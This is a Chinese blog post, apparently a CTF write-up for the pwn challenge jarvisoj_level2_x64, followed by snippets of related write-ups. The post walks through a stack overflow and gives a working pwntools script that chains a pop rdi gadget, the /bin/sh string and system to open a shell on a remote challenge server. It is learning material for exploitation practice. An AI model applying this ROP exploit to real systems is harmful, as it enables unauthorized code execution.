jarvisoj_level2_x64

于 2024-07-13 20:23:43 发布
阅读量239 收藏
点赞数 3
文章标签: python pycharm 开发语言
加油加油~
本文链接:https://blog.csdn.net/wcj126/article/details/140405193
版权

没有开启栈保护,只有nx保护

运行一下,流程不能忘

输入?注意下输入函数

IDA打开

buf只要128,却读取了0x200

这包给他构建函数的

这是64位,我们首先要通过寄存器传参

ROPgadget --binary jar --only 'pop|ret'

这里我师傅说一般用pop rdi

所以记录地址

这道题system和bin/sh都是直接拿到的

 

from pwn import *

context(log_level = 'debug')
elf = ELF('./jar')
p = remote('node5.buuoj.cn',25222)

systemaddr=0x40063E
shelladdr=0x600a90
pop_rdiaddr=0x4006b3

payload= b'a'*(0x80+8)+p64(pop_rdiaddr)+p64(shelladdr)+p64(systemaddr)

p.sendline(payload)
p.interactive()

 我们的esp是在低地址的,虽然栈是上面溢出,但是地址是从下面开始运行的

所以我们填充完后,程序先执行到pop ,这个Pop 有两个左右 pop 下面一个参数,system 然后 跟着return,又回到下面了,下面紧跟着就是参数 shell

如果是32位 我们payload安排就是 system +shell这样构建就ok

_Nickname
关注
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1441
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
【BUUCTF-PWN】13-jarvisoj_level2_x64
最新发布
燕麦葡萄干的博客
07-05 416
ret指令的地址,再接着是’/bin/sh’字符串的地址,最后是system()函数的地址。ret处,该指令会将当前栈顶的元素(‘/bin/sh’字符串的地址)出栈并存入rdi中,并返回到下一条指令处。此时栈中就只有system()函数的地址了,所以下一条指令正是system(),而它需要的参数正好就在rdi寄存器中,这样就执行了system(’/bin/sh’)现在只需要让函数返回到system,并传入参数“/bin/sh”就可以了。32位的比较简单,只需要返回地址+下一次的返回地址+参数1+参数2+…
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 482
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
BUUCTF:jarvisoj_level3_x64(write up)
qq_44768749的博客
08-24 943
BUUCTF:jarvisoj_level3_x640x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,仅开启栈不可执行保护 0x02 运行 输入一个字符串 0x03 IDA 字符串可输入长度可造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露read函数地址来得到libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 这里有个难点就是参数需要放到对应
jarvisoj_level2
08-13
- *1* *3* [jarvisoj_level2_x64](https://blog.csdn.net/zip471642048/article/details/125448386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 529
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
【BUUCTF - PWN】jarvisoj_level0
古月浪子的博客
04-05 681
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
PWN_JarvisOJ_Level2_x64
michaelinfinity的博客
03-16 1432
关于level2我就不多做赘述了。这道题和level2之间的区别就是一个是32位的栈溢出,另一个就是64位的栈溢出。 32位的函数在调用栈的时候是: 调用函数地址->函数的返回地址->参数n->参数n-1....->参数1 64位的函数在调用栈的时候是: 前六个参数按照约定存储在寄存器:rdi,rsi,rdx,rcx,r8,r9中。 ...
[BUUCTF-pwn]——jarvisoj_level2_x64
Y_peak的博客
02-11 352
[BUUCTF-pwn]——jarvisoj_level2_x64 题目地址:https://buuoj.cn/challenges#jarvisoj_level2_x64 checksec 一下,64位 ,开启NX保护 64位应该会用到pop rdi这个汇编指令 在IDA中看看 思路:64位先将binsh这个参数放入,rdi寄存器中.紧接着返回并执行system函数 exploit from pwn import * p = remote("node3.buuoj.cn",27828) b
jarvis oj level2_x64
发蝴蝶和大脑斧的博客
12-05 540
接下来做64位了,首先看下和32位有什么不一样。这篇文章的第3节说的很详细 主要来说就是: 1.内存地址的范围由32位变成了64位,但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。 2.x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。我们要修改寄存器的值就得通过找到例如pop rdi;ret这样...
BUUCTF jarvisoj_level2_x64
小白垃圾笔记2
05-12 300
因为有栈对齐所以需要ret,因为是64位传参所以需要pop rdi。system函数的地址也可以看。小白做题笔记,不建议阅读。我们尝试找下bin/sh。函数直接调用漏洞函数。
jarvisoj_level2_x64[BUUCTF]
moonlightsunshin的博客
05-04 370
32位中参数都是保存在栈上,但在64位中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。read函数存在溢出同时发现有/bin/sh所以我们思路就是构造溢出到/bin/sh,但是由于是64位的程序在函数调用时与32位不同。由32位变成了64位。payload的组成 无用数据+pop rdi+函数参数+函数调用地址/bin/sh+函数返回地址system。回到这道题 64位会依次传函数返回地址,函数参数,函数调用地址,
BUUCTF pwn——jarvisoj_level2_x64
CNS-Enterprise BCC-1701-J
04-03 276
BUUCTF 做题练习
JarvisOJ level2x64
PLpa的博客
07-09 531
这题和level2的漏洞和处理方式差不多,只不过level2是x86而这题是x64的 前言: 首先,我们先看一下x64和x86的区别: linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86中参数都是保存在栈上,但在x64中的前六个参...
jarvis oj---level2x64
weixin_45427676的博客
09-29 331
题目来源 nc pwn2.jarvisoj.com 9882 level2_x64.04d700633c6dc26afc6a1e7e9df8c94e 解题 x64和x86的区别: linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_Nickname

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值